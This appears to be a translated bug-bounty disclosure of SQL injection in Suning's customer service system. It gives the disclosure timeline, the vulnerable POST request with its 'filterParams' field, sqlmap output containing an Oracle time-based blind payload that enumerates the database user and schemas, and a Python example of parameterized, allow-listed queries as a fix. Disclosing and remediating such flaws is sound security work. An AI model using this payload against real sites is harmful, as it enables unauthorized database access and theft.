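2015-07-20: Details reported to the vendor; awaiting vendor handling
2015-07-20: Vendor confirmed; details disclosed to the vendor only
2015-07-30: Details disclosed to core white hats and experts in the relevant field
2015-08-09: Details disclosed to regular white hats
2015-08-19: Details disclosed to intern white hats
2015-09-03: Details disclosed to the public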
Little fatty, you!
Suning customer service system
POST http://online.suning.com/console/Service/commissionGoods/pageCommissionGoods HTTP/1.1
Host: online.suning.com

companyId=1&filterParams=+1+%3D+1++and+creator+like+'%251%25'++and+category+like+'%251%25'++and+brand+like+'%251%25'++and+code+like+'%251%25'+&page=1&rows=20&sort=id&order=asc
POST parameter 'filterParams' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 325 HTTP(s) requests:
---
Parameter: filterParams (POST)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: companyId=1&filterParams= 1 = 1 and creator like '%1%' and category like '%1%' and brand like '%1%' and code like '%1%' AND 1608=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)&page=1&rows=20&sort=id&order=asc
---
[23:08:48] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[23:08:48] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[23:08:48] [INFO] fetching current user
[23:08:48] [INFO] retrieved:
[23:08:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
SU
[23:13:12] [ERROR] invalid character detected. retrying..
[23:13:12] [WARNING] increasing time delay to 6 seconds
NING
current user: 'SUNING'
[23:19:54] [INFO] fetching current database
[23:19:54] [INFO] resumed: SUNING
[23:19:54] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'SUNING'
[23:19:54] [INFO] testing if current user is DBA
current user is DBA: False
[23:19:54] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[23:19:54] [INFO] fetching database (schema) names
[23:19:54] [INFO] fetching number of databases
[23:19:54] [INFO] retrieved: 9
[23:21:31] [INFO] retrieved: A
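The request above sends a ready-made SQL predicate in `filterParams`, and the sqlmap output shows that text reaching the Oracle query. A hardened shape for such an endpoint, as an added example (not Suning's code, which the page does not show): the client sends structured filters, column and sort names are allow-listed, and values are bound. Assumptions: the `commission_goods` table and `company_id` column names are hypothetical, the sample rows are constructed, and SQLite stands in for Oracle so the block runs offline.

```python
import sqlite3

FILTERABLE = {"creator", "category", "brand", "code"}  # columns seen in the page's request
SORTABLE = FILTERABLE | {"id"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}

def build_query(company_id, filters, sort="id", order="asc", page=1, rows=20):
    """Build (sql, params) from structured filters {column: substring}."""
    clauses, params = ["company_id = ?"], [int(company_id)]
    for column, needle in filters.items():
        if column not in FILTERABLE:  # identifiers cannot be bound, so allow-list them
            raise ValueError(f"filter column not allowed: {column!r}")
        # Escape LIKE metacharacters so the value only ever matches literally.
        needle = str(needle).replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
        clauses.append(f"{column} LIKE ? ESCAPE '\\'")
        params.append(f"%{needle}%")
    if sort not in SORTABLE or str(order).lower() not in DIRECTIONS:
        raise ValueError("sort/order not allowed")
    rows = min(max(int(rows), 1), 100)  # cap page size
    sql = ("SELECT id FROM commission_goods WHERE " + " AND ".join(clauses) +
           f" ORDER BY {sort} {DIRECTIONS[str(order).lower()]} LIMIT ? OFFSET ?")
    return sql, params + [rows, (max(int(page), 1) - 1) * rows]

def make_db():
    """Constructed sample data; table and company_id column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE commission_goods (id INTEGER PRIMARY KEY, company_id INTEGER,"
               " creator TEXT, category TEXT, brand TEXT, code TEXT)")
    db.executemany("INSERT INTO commission_goods VALUES (?,?,?,?,?,?)", [
        (1, 1, "user1", "cat1", "brand1", "c1"),
        (2, 1, "user2", "cat2", "brand2", "c2"),
        (3, 2, "user1", "cat1", "brand1", "c1"),
    ])
    return db

def search(db, company_id, filters, **kw):
    """Run the parameterized query and return the matching ids."""
    sql, params = build_query(company_id, filters, **kw)
    return [r[0] for r in db.execute(sql, params)]

if __name__ == "__main__":
    db = make_db()
    print(search(db, 1, {"creator": "1", "code": "1"}))  # normal substring filter
    print(search(db, 1, {"creator": "x' OR '1'='1"}))    # SQL text stays data
```

On Oracle the same structure applies with named binds (`:creator`) and the database's own paging syntax.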
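Severity: High
Vulnerability Rank: 10
Confirmation time: 2015-07-20 09:37
Thank you for the submission. A single vulnerability is valued at the lower amount.
None yet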